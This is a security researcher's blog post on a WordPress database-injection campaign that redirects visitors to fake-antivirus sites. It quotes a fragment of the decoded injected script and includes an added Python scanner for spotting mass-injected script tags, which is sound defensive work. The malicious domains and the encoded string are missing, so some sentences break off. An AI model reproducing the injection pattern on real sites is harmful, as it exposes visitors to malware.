Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a JavaScript link pointing to in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to (both hosted at

This hack also injects the malware on every post in the database, but this time encoded as:


Which decodes to:

document.write('<script src="

Unfortunately, the domain being used is not blacklisted by Google (or any AV), so the risk is high for every site visitor… If you want to verify your site to ensure it hasn’t been infected, you can scan it here: Sucuri SiteCheck
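A local check to complement an external scan, as an added example that is not from the original post: it reads `(ID, post_content)` rows exported from `wp_posts` and reports script elements repeated across many posts (the pattern described above, whatever encoding the payload uses) plus external script hosts outside an allowlist. The `scan_posts` helper, the `mass_ratio` threshold, the sample rows and the host names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Heuristic matchers; a regex is enough here because the injected markup is
# a complete <script> element appended to post_content.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>.*?</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

def scan_posts(posts, allowed_hosts, mass_ratio=0.5):
    """posts: (ID, post_content) rows. Returns foreign script hosts and
    script elements that repeat in at least mass_ratio of all posts."""
    posts = list(posts)
    foreign = defaultdict(set)   # host -> post IDs loading a script from it
    seen_in = defaultdict(set)   # whitespace-normalized element -> post IDs
    for post_id, content in posts:
        for el in SCRIPT_RE.finditer(content or ""):
            src = SRC_RE.search(el.group(1))
            if src:
                host = (urlparse(src.group(1)).hostname or "").lower()
                if host and host not in allowed_hosts:
                    foreign[host].add(post_id)
            seen_in[" ".join(el.group(0).split())].add(post_id)
    threshold = max(2, int(len(posts) * mass_ratio))
    return {
        "foreign_hosts": {h: sorted(ids) for h, ids in foreign.items()},
        "mass_injected": {el: sorted(ids) for el, ids in seen_in.items()
                          if len(ids) >= threshold},
    }

# Constructed sample rows; the payload is an inert stand-in, not the real string.
INJECTED = "<script>/* constructed stand-in for the encoded payload */</script>"
SAMPLE_POSTS = [
    (1, "First post." + INJECTED),
    (2, 'Second. <script src="https://widgets.example.org/w.js"></script>' + INJECTED),
    (3, 'Third.<script src="http://injected.example/js.php"></script>'),
    (4, "Fourth." + INJECTED),
]

if __name__ == "__main__":
    report = scan_posts(SAMPLE_POSTS, allowed_hosts={"widgets.example.org"})
    for host, ids in report["foreign_hosts"].items():
        print("external script host", host, "in posts", ids)
    for element, ids in report["mass_injected"].items():
        print("repeated script in posts", ids, ":", element[:60])
```

Any element reported under `mass_injected` that you did not place in your posts yourself is worth reviewing before cleanup, since the same string in most rows is what a bulk database update leaves behind.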

What happens when someone clicks an infected site?

They are redirected to one of the following sites where the infamous Fake AV is pushed to the user…

Here is the whois for the group responsible for that domain (not Hilary Kneber this time, but since they are using the same IP addresses and intermediary hosts, we assume it is all the same):

Registrant Contact:
Jannet Degree
+154654645234 fax: +154654645234
Jose Road 78
SanHose NA 64567

We will post more details as we learn more about it.

If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.
